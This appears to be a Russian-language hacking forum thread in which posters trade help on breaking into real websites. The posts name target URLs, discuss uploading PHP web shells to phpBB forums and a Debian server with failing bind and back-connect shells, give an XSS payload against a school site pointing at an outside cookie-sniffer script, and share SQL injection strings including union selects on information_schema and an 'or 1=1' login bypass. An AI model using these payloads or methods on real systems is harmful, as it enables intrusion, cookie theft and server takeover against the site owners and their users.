http://www.prodisney.ru/index.php?page=GPI все вроде отлично, но не пойму одного: почему при ссылке на мой шелл с народа браузер предлагает скачать shell.php? пробовал менять расширение шелла на txt, теперь на старницу выводиться тект шелла(необработанный пхп)
не канает метод шанкара... остальные тожe, когда аватарку загружаю выдает вот это Unable to upload file DEBUG MODE Line : 251 File : usercp_avatar.php Что посоветуете?
http://school145.edu.kh.ua/livesearch/search/query/?value="><script>alert()</script> вместо "><script>alert()</script> скрипт сниффера(например sniffer.xaknet.ru)
Ну что же друзья, может это будет и оффтоп , но решилась не одна проблема по заливке шелла на форум пхпбб, много форумов у которых не срабатывал ни один общеизветсный способ заливки кода ,сегодня стали достоянием моего списка с шеллами. И все благодаря способу который Pashkela описал тут link .Всем рекомендую.
вообщем такая проблемка,есть linux (debian) 2.6.18. залил шелл wso2,биндпорт,бэкконнект не проходит... при вводе which gcc ничего не показует, хотя на вкладке шелла [sec. info] явно показует (gcc version 4.1.2 20061115 (prerelease)... как быть дальше? может попробовать скомпилированый сплоит под это ядро? вот только где взять компилированый? wget присутствует... P.S. Я так понимаю что если выход в инет осуществляется через VPN сервер то бэкконект и биндпорт непроканает?...
как инъекцию раскрутить если фильтруются скобки, то есть к примеру @@version проходит, а version() нет ?
писать запросы без скобок union+select+1,2,table_name+from+information_schema.tables ни одной скобки, уау PS: Без юзера и прочих параметров как-нибудь можно пережить трагедию
where column_name like(0x70617373) or column_name like(0x61646d696e) or column_name like(0x75736572) ..........
вопрос по скуле) я в логине ввожу "логин пользователя' or 1=1 -- " мне выдало ошибку Ошибка разбора XML: синтаксическая ошибка (Строка: 11, Символ: 36) Обработать документ как HTML Ошибка:invalid start-tag в ошибке выделена красным первая буква логина a HTML: 8: </head> 9: <card id="main" title="Lost Paradise"> 10: <p>Ваш персонаж покинул игру из-за бездействия в течение 4 минут. 11: <br/><a href="game.php?login=user.\"ambal\\\' or 1=1 -- \"&p=&r=6631&p=&site=connect2">Войти</a> в игру 12: <br/>---<br/><a href="game.php?sid=user.\"ambal\\\' or 1=1 -- \"&p=&r=6631&r=4299">[В игру]</a></p> 13: </card></wml> из за чего? просто xml я не знаю... подскажите кто-нибудь.
скорей всего данные в браузер идут как xml, а там твой логин с кавычкой, который ты вводил - а в xml кавычку нужно в html-сущность переводить, иначе ошибка. В общем, к скуле это имеет отдаленное отношение, плюс ко всему - там MQ on.
В общем не знаю там ли написал, но вот такой вот вопрос ребята. В некой БД как то странно время вычисляется в виде цифр, в колонке time к примеру 1269553831 или 1269554171 . Я так понимаю это какая то зашифрованная дата или цифра. Как расшифровать? И можно ли цифру преобразовать в такой код.
